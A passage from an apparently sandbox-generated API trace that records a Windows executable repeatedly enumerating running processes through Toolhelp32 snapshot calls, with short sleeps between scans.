dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0113.952] CloseHandle (hObject=0xc4) returned 1 [0113.952] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0113.957] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.957] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0113.958] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0113.959] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.959] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0113.960] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.960] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0113.961] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0113.962] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0113.962] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0113.963] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.964] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.965] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.966] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.966] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.967] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0113.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0113.970] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0113.972] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0113.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0113.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0113.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0113.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0113.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0113.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0113.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0114.581] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0114.583] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0114.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0114.585] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0114.587] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0114.588] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0114.590] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0114.591] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0114.592] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0114.594] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0114.595] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0114.596] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0114.597] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0114.599] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0114.600] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0114.601] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0114.602] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0114.603] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0114.605] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0114.606] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0114.608] CloseHandle (hObject=0xbc) returned 1 [0114.608] Sleep (dwMilliseconds=0x12c) [0115.244] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0115.249] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.250] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0115.251] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0115.251] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0115.252] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0115.252] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0115.253] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0115.254] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0115.255] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0115.255] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0115.256] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.257] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.257] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.258] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.259] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.260] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0115.260] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.261] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.262] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0115.265] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.267] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0115.268] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0115.269] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0115.271] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0115.272] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.273] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0115.275] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0115.276] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0115.291] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0115.292] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0115.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0115.295] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 